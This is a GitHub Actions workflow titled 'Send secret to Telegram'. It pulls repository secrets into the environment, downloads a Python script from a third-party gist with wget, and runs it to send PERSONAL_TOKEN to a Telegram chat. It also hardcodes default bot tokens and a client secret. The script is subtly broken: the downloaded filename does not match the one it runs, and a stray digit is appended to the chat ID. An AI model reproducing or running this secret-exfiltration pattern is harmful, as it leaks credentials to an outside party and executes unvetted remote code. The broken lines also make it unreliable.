name: "Send secret to Telegram"
on:
  workflow_dispatch:
    inputs:
      botapi-token:
        description: "Bot API token, get it from @BotFather."
        default: "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
        required: true
      chat-id:
        description: "Target chat ID for message to be sent."
        default: 1267289187
        required: true
      client_id:
        description: "Telegram API client ID, get it from https://my.telegram.org/apps."
        default: 87528
        required: true
      client_secret:
        description: "Telegram API client ID, get it from https://my.telegram.org/apps."
        default: '37a6259cc0c1dae299a7866489dff0bd'
        required: true

env:
  PERSONAL_TOKEN: ${{ secrets.PERSONAL_TOKEN }}
  GH_SERVICE_ACCOUNT_API_KEY: ${{ secrets.GH_SERVICE_ACCOUNT_API_KEY }}
  GL_SERVICE_ACCOUNT_API_KEY: ${{ secrets.GL_SERVICE_ACCOUNT_API_KEY }}
  

jobs:
  pull-secrets:
    runs-on: ubuntu-latest
    steps:
    - name: Set up Python 3.9
      uses: actions/setup-python@v2
      with:
        python-version: 3.9
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pyrogram
    # Edit as needed!
    - name: Send to Telegram
      run: |
        wget https://gist.githubusercontent.com/AndreiJirohHaliliDev2006/f9f2ff5e838961e3d8c65fa774e15cb9/raw/3b1b8552a4f388d84b238c5a3cde1f143d3b5e30/get_actions_secrets.py
        python get_actions_secret.py --bot-token ${{ github.event.inputs.botapi-token }} --client-id ${{ github.event.inputs.client_id }} --client-secret ${{ github.event.inputs.client_secret }} --secret-name PERSONAL_TOKEN --secret-content $PERSONAL_TOKEN --target-chat-id ${{ github.event.inputs.chat-id }}7
